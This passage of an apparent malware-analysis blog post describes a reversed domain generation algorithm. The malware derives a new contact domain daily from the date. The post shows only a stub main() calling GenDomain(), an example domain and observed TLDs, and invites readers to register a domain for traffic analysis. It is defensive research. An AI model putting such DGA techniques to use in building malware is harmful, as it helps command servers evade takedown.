<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">main(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">{</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="white-space: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">GenDomain();</span></span></div>
<div style="color: #bf2e9d; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: black;"><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="color: #008326; white-space: normal;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">return</span><span style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">0</span></span><span style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">}</span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="color: #008326; font-family: Menlo; font-size: 11px;">
<span class="Apple-style-span" style="color: black; font-family: Helvetica; font-size: 12px;"><br /></span></div>
<div style="color: #008326; font-family: Menlo; font-size: 11px;">
<span style="color: black;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Basically it generates a stream of characters calculated from the current date (using day, month and year), so that every day a new domain is generated and contacted.</span></span></span></div>
</div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="color: #008326;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">For example, the domain of the day (12/04/2012) is:</span></span></div>
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
</span><br />
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Domain: fhnqskxxwloxl </span></span><br />
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">
</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Note that this routine generates only the domain name, and not the TLD. It seems that the possible TLDs used by the malware are encrypted with strong encryption and the key is uniquely generated from the infected machine at install time, therefore I'm unable to find them as I got only the payload and not the full installer.</span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We can do a little research using Google anyway </span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">and it seems that the following TLDs have been observed:</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.com</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.net</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.kz</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.in</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.info</span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #008326; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now that the domain generator algorithm is demystified you can try to register one of the domains (if you can find one still available!) and perform your own traffic analysis!</span></span></div>
</span><br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0